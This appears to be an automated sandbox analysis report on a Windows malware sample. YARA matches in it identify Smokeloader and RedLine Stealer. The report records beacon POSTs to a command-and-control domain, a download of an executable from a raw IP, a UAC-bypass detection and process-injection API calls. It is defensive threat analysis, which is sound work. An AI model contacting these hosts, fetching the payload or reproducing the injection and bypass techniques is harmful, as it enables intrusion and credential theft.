Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjvagowrnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ueuounaic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhxqowscaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqdpmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxslssk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbdses.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxvmoh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlixtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bymgj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jviyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://papeicwkil.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csplko.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecwfh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avfvrfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouqhut.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amjtlofw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: dowe.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrgphm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dowe.at
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: unknown TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tajcoxqjmd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: dowe.at
Source: unknown DNS traffic detected: queries for: dowe.at
Source: global traffic HTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
Source: global traffic HTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
Source: unknown HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: dfhwrav, 00000009.00000002.385029493.00000000006EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: Yara match File source: Process Memory Space: ADCA.exe PID: 1432, type: MEMORYSTR

System Summary

barindex
Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00881940 10_2_00881940
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00897244 10_2_00897244
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00885B34 10_2_00885B34
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_008770C4 10_2_008770C4
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_006BA8DC 10_2_006BA8DC
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00889622 10_2_00889622
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0088C79C 10_2_0088C79C
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: String function: 0040ACB4 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: String function: 0040A3C0 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: String function: 0040A0C0 appears 300 times
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: String function: 0040AEFC appears 33 times
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401400 NtAllocateVirtualMemory, 0_2_00401400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401501
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401427 NtAllocateVirtualMemory, 0_2_00401427
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014DB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014ED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004014F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004013F5 NtAllocateVirtualMemory, 0_2_004013F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040138D NtAllocateVirtualMemory, 0_2_0040138D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402F9D GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,RtlCreateUserThread,strstr, 0_2_00402F9D
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_004014CF
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401400 NtAllocateVirtualMemory, 9_2_00401400
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_00401501
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401427 NtAllocateVirtualMemory, 9_2_00401427
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_004014DB
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_004014ED
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_004014F0
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_004014F4
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004013F5 NtAllocateVirtualMemory, 9_2_004013F5
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_0040138D NtAllocateVirtualMemory, 9_2_0040138D
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00402F9D CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess, 9_2_00402F9D
Source: file.exe Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
